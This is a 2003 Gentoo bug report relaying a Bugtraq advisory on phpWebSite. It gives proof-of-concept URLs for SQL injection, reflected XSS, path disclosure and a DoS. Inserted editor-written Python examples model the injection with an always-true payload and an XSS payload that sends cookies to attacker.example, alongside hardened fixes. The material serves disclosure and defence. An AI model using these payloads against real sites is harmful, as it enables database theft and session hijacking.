Bug 26802 - net-www/phpwebsite
Summary: net-www/phpwebsite
Status: RESOLVED FIXED
Alias: None
Product: Gentoo Linux
Classification: Unclassified
Component: New packages
Hardware: All Linux
Importance: Highest critical
Assignee: Gentoo Security
Reported: 2003-08-17 06:46 UTC by Daniel Ahlberg (RETIRED)
Modified: 2003-09-02 01:46 UTC
Description Daniel Ahlberg (RETIRED) gentoo-dev 2003-08-17 06:46:50 UTC
phpWebSite SQL Injection & DoS & XSS Vulnerabilities

From: "Lorenzo Hernandez Garcia-Hierro" <novappc@novappc.com>
To: bugtraq@securityfocus.com
Date: 2003-08-11 01.16
------
PRODUCT: phpWebSite 
VENDOR: Appalachian State University 
VULNERABLE VERSIONS: 
 
       - 0.9.x 
       - 0.8.x 
       - 0.7.x 
       - And older versions. 
 
NON-VULNERABLE VERSIONS:

- ?
--------------------- 
 
Description: 
 
phpWebSite provides a complete web site content management system. Web- 
based administration allows for easy maintenance of interactive,  
community-driven web sites. 
 
--------------------------------------------- 
|SECURITY HOLES FOUND and PROOFS OF CONCEPT:| 
--------------------------------------------- 
 
I encountered SQL Injection vulnerabilities in some of the phpWebSite
modules, XSS (Cross Site Scripting), Path Disclosures and a Denial of
Service attack.
 
------------- 
| SQL       | 
| INJECTION | 
------------- 
 
I encountered SQL Injection vulnerabilities in the Calendar module,
active in default configurations, that allow you to execute SQL queries
on the target server with the privileges of the application user.

When you send a specially crafted URL to the Calendar script you get
a SQL error flag like this:
__________________________________________________________________ 
DB Error: syntax error 
select * from mod_calendar_events where ((startDate >= 2003\0[CRAFTED  
VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or  
(endDate >= 2003\0[CRAFTED VALUE]0110 and endDate <= 2003\0[CRAFTED  
VALUE]0110)) and active=1 [nativecode=1064  
** You have an error in your SQL syntax near  
'\0[CRAFTED VALUE]0110 and startDate <= 2003\0[CRAFTED VALUE]0110) or  
(endDate >= 2003\0[CRAFTED VALUE]0110 and endDate ' at line 1] 
___________________________________________________________________ 
 
This is an example error flag: 
___________________________________________________________________ 
DB Error: syntax error 
select * from mod_calendar_events where ((startDate >= 2003\0-10110 and  
startDate <= 2003\0-10110) or  
(endDate >= 2003\0-10110 and endDate <= 2003\0-10110)) and active=1  
[nativecode=1064  
** You have an error in your SQL syntax near  
'\0-10110 and startDate <= 2003\0-10110) or (endDate >= 2003\0-10110  
and endDate ' at line 1] 
___________________________________________________________________ 
 
To get this you must use this simple URL:

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=

And you get the SQL error flag. The error occurs when the query
includes the crafted value 2003[%00 = null]-1.
You can design a successful query to get configuration values or
authentication data.
I designed a URL that makes a successful query (not a hostile query):

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=month&month=11&year=2003%20and%20startDate%20%3c%3d%2020071205%29%20or%20%28%20endDate%20%3e%3d031101%20and%20endDate%20%3c%3d%2020071205%29%29%20and%20active%3d1
 
It is (without URL encoding):

2003 and startDate <= 20071205) or ( endDate >=031101 and endDate <= 20071205)) and active=1

A little knowledge of SQL (in this case, MySQL) is needed to make a
successful attack.
 
Other scripts of the Calendar module are affected by this hole: when
you send a crafted request, like a + symbol as the value of a critical
URL variable, you get the "pure" SQL server error flag and you can
imagine (I like this word) a SQL query to view private information of
the application by looking at the error pages, like a trial-and-error
method.

Other URLs to probe are:

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=day&month=0&year=<

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=day&month=1%00&year=)SQL_INJECTION_FAKU
 
------------------ 
| XSS            | 
| vulnerabilities|  
------------------ 
 
I encountered XSS security holes in some scripts of phpWebSite:

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00">[XSS ATTACK CODE]

http://[HOST]/[PATH]/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+">[XSS ATTACK CODE]

http://[HOST]/[PATH]/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10">[XSS ATTACK CODE]&MMN_position=[X:X]

http://[HOST]/[PATH]/index.php?module=search&SEA_search_op=continue&PDA_limit=10">[XSS ATTACK CODE]
 
 
Note that the Calendar, PageMaster and Fatcat modules are COMPLETELY
affected, and all the script variables that are passed by URL are
affected too.

When you access a hostile link with an XSS attack in those scripts your
browser will execute the script commands.
This can be used to steal cookies, authentication tokens and other
private information.
If your browser is vulnerable to other holes (like MSIE ;-) you can
have more problems...

XSS AT SQL ERRORS:

If you send a crafted URL with XSS attack code to some of the scripts
that are vulnerable to SQL injection, the XSS attack code will be
executed in the error page.
 
 
----------------- 
| PATH          | 
|  DISCLOSURES  | 
----------------- 
 
I tested this on Win2K (Windows 2000 Professional) with SP3 and these
versions:

- Sambar Server 5.2 beta
- PHP 4.2.3 running as ISAPI module
- MySQL NT [normal service] 3.23.56
- include_path set to the pear folder of phpWebSite

Sending this:

http://127.0.0.1/index.php?module=calendar&calendar[view]=month&month=11&year=9
(you can try other things and get the same)
 
you get this: 
 
Warning: localtime(): invalid local time in  
C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252 
 
Warning: localtime(): invalid local time in  
C:\ws\phpws\lib\pear\Date\TimeZone.php on line 252 
 
<- more than fifty repetitions of this warning -> 
 
It is a strange error; I think it only occurs on MS Windows
installations.
Possibly it occurs when the PEAR library TimeZone.php script tries to
convert the local date into Unix timestamp format.
 
------------------ 
| DENIAL OF      | 
|  SERVICE       | 
------------------ 
 
There is a DoS/buffer overflow attack in a script inside the Calendar
module that allows you to crash the host running the MySQL server and
the phpWebSite scripts (they must be the same computer).

This is a basic proof of concept for this vulnerability:

http://[HOST]/[PATH]/index.php?module=calendar&calendar[view]=[VIEW FORM]&month=11&year=91+92+93...( more than 4000 bytes )

An attack like this causes a global system crash, including the server
service and the MySQL service.
 
----------------- 
|   SoLuTiOnS   | 
----------------- 
 
1.- Be sure that the phpWebSite database user has only SELECT, INSERT
    and UPDATE privileges, and only on the phpWebSite database.

2.- Use the PHP function eregi_replace to prevent XSS attacks.

3.- Turn php_error_flags Off.

4.- In addition, use an external module such as mod_security if you
    are using Apache.

5.- If you are paranoid don't use PHP, MySQL, Windows, Linux,
    computers, TCP/IP, NetBIOS, games, ASP, Apache...... nothing!
    WARNING ;-) : ( paranoid solution... )
 
----------- 
| CONTACT | 
----------- 
 
Lorenzo Hernandez Garcia-Hierro 
--- Computer Security Analyzer --- 
--Nova Projects Professional Coding-- 
PGP: Keyfingerprint 
B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2 
ID: 0x9C38E1D7 
********************************** 
www.novappc.com 
security.novappc.com 
www.lorenzohgh.com 
______________________ 
 
NSRG-20-7
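The numeric injection in the Calendar module's year parameter, modelled as an added example. This is editor-written Python, not phpWebSite code and not the advisory author's proof of concept. The query template, the table layout and the events are assumptions reconstructed from the error text quoted in the advisory; the real phpWebSite code is not reproduced. What it shows is why the error page above contains `2003\0-1`: PHP's addslashes (magic_quotes) escapes the NUL byte as `\0`, which is enough to break the SQL syntax and leak an error, but it never protects an unquoted numeric literal, so a payload containing no quote characters passes straight through. Integer allow-listing plus bound parameters closes both the injection and the error oracle.

```python
"""Added example (not phpWebSite code): numeric SQL injection in a
calendar month query, the addslashes caveat, and the hardened version.
The query template and sample data are assumptions, not from the page."""
import re
import sqlite3

# Constructed sample data (not from the advisory): id, startDate, endDate,
# active, title. Dates are YYYYMMDD integers, as the quoted query implies.
SAMPLE_EVENTS = [
    (1, 20031105, 20031105, 1, "Nov 2003 meeting"),
    (2, 20040212, 20040212, 1, "Feb 2004 event"),
    (3, 20071201, 20071205, 1, "Dec 2007 event"),
    (4, 20031120, 20031120, 0, "Nov 2003 (inactive)"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table mod_calendar_events "
                 "(id integer, startDate integer, endDate integer, "
                 "active integer, title text)")
    conn.executemany("insert into mod_calendar_events values (?,?,?,?,?)",
                     SAMPLE_EVENTS)
    return conn


def vulnerable_query(year, month):
    # Assumed template: year and month are concatenated straight into
    # unquoted numeric literals, which is what the advisory's error text
    # ('startDate >= 2003\0-10110') suggests.
    start = f"{year}{month}01"
    end = f"{year}{month}31"
    return ("select id from mod_calendar_events where "
            f"((startDate >= {start} and startDate <= {end}) or "
            f"(endDate >= {start} and endDate <= {end})) and active=1")


def run_vulnerable(year, month):
    conn = make_db()
    return sorted(r[0] for r in conn.execute(vulnerable_query(year, month)))


def php_addslashes(s):
    """Emulates PHP addslashes()/magic_quotes_gpc: escapes ' " \\ and NUL.
    The NUL case is where the '\\0' in the advisory's error text comes from."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\x00", "\\0"))


def probe_error(year, month):
    """Returns the DB error text for a malformed value after addslashes,
    mirroring the 'DB Error: syntax error' page the advisory uses as an
    oracle; None if the value ran without error."""
    try:
        run_vulnerable(php_addslashes(year), month)
    except sqlite3.OperationalError as e:
        return str(e)
    return None


# Payload in the advisory's style: closes the comparison, adds an
# always-true branch, and re-balances the parentheses of the assumed
# template. It contains no quote or NUL, so addslashes leaves it intact.
PAYLOAD = "0) or (1=1 or 1="


def safe_query(year, month):
    # Hardened: allow-list the shape, bound the range, then bind parameters
    # instead of concatenating anything into the SQL text.
    if not re.fullmatch(r"\d{4}", year) or not re.fullmatch(r"\d{1,2}", month):
        raise ValueError("year/month must be numeric")
    y, m = int(year), int(month)
    if not (1970 <= y <= 2100 and 1 <= m <= 12):
        raise ValueError("year/month out of range")
    start, end = y * 10000 + m * 100 + 1, y * 10000 + m * 100 + 31
    sql = ("select id from mod_calendar_events where "
           "((startDate >= ? and startDate <= ?) or "
           "(endDate >= ? and endDate <= ?)) and active=1")
    return sql, (start, end, start, end)


def run_safe(year, month):
    conn = make_db()
    sql, params = safe_query(year, month)
    return sorted(r[0] for r in conn.execute(sql, params))


if __name__ == "__main__":
    print("legit:", run_vulnerable("2003", "11"))
    print("injected:", run_vulnerable(php_addslashes(PAYLOAD), "11"))
    print("NUL oracle:", probe_error("2003\x00-1", ""))
```

`run_vulnerable(PAYLOAD, "11")` returns every active event regardless of year, and `php_addslashes` does not change the payload; `run_safe` rejects it before any SQL is built, and the NUL probe that produces the advisory's error page also fails validation rather than reaching the database.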
Comment 1 fbusse 2003-08-25 10:46:50 UTC
All those problems have been fixed in 0.9.3-1 
Comment 2 Daniel Ahlberg (RETIRED) gentoo-dev 2003-09-02 01:46:08 UTC
glsa sent
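The reflected XSS the advisory demonstrates for PAGE_id and fatcat_id (a URL parameter echoed into an HTML attribute, broken out of with `">`), as an added example in Python. This is editor-written code, not phpWebSite's templates and not from any comment on this bug; the link template and the sample payload are assumptions. It shows the attribute breakout becoming a real `<script>` element, and the fix the advisory's "eregi_replace" suggestion approximates: validate the parameter as a bounded integer (which also caps the oversized values used in the DoS section), URL-encode the query string, and HTML-encode the attribute on output rather than filtering characters out of the input.

```python
"""Added example (not phpWebSite code): reflected XSS via an unencoded
URL parameter in an HTML attribute, and the validate-then-encode fix.
The link template and payload are constructed for this illustration."""
import html
from html.parser import HTMLParser
from urllib.parse import urlencode


class TagCollector(HTMLParser):
    """Records every start tag, so we can ask whether attacker-controlled
    text became real markup instead of staying inside the attribute."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def injected_tags(markup):
    """Start tags other than the intended <a> element."""
    p = TagCollector()
    p.feed(markup)
    p.close()
    return [t for t in p.tags if t != "a"]


def render_vulnerable(page_id):
    # Assumed template: the raw parameter is concatenated into a link's
    # href attribute, as the advisory's 'PAGE_id=10">[XSS ATTACK CODE]'
    # PoC implies.
    return ('<a href="index.php?module=pagemaster&PAGE_user_op=view_page'
            '&PAGE_id=' + page_id + '">view page</a>')


MAX_ID_DIGITS = 9  # bounds the value; also stops multi-kilobyte params


def render_safe(page_id):
    # Hardened: allow-list as a small positive integer (rejects '">', NUL
    # bytes and oversized values alike), URL-encode the query string, then
    # HTML-encode it for the attribute context.
    if not page_id.isdigit() or len(page_id) > MAX_ID_DIGITS:
        raise ValueError("PAGE_id must be a small positive integer")
    query = urlencode({"module": "pagemaster",
                       "PAGE_user_op": "view_page",
                       "PAGE_id": int(page_id)})
    return '<a href="index.php?' + html.escape(query, quote=True) + '">view page</a>'


# Constructed payload; attacker.example is a placeholder host, not a real site.
XSS_PAYLOAD = ('10"><script>document.location="http://attacker.example/?"'
               '+document.cookie</script>')


if __name__ == "__main__":
    print("vulnerable:", injected_tags(render_vulnerable(XSS_PAYLOAD)))
    print("safe:", render_safe("10"))
```

With the payload, `injected_tags(render_vulnerable(...))` reports a `script` element, which is exactly what the victim's browser would execute; `render_safe` refuses the same value, a NUL-containing value like the fatcat_id PoC, and a several-thousand-byte value, and for a legitimate id produces markup with no extra tags.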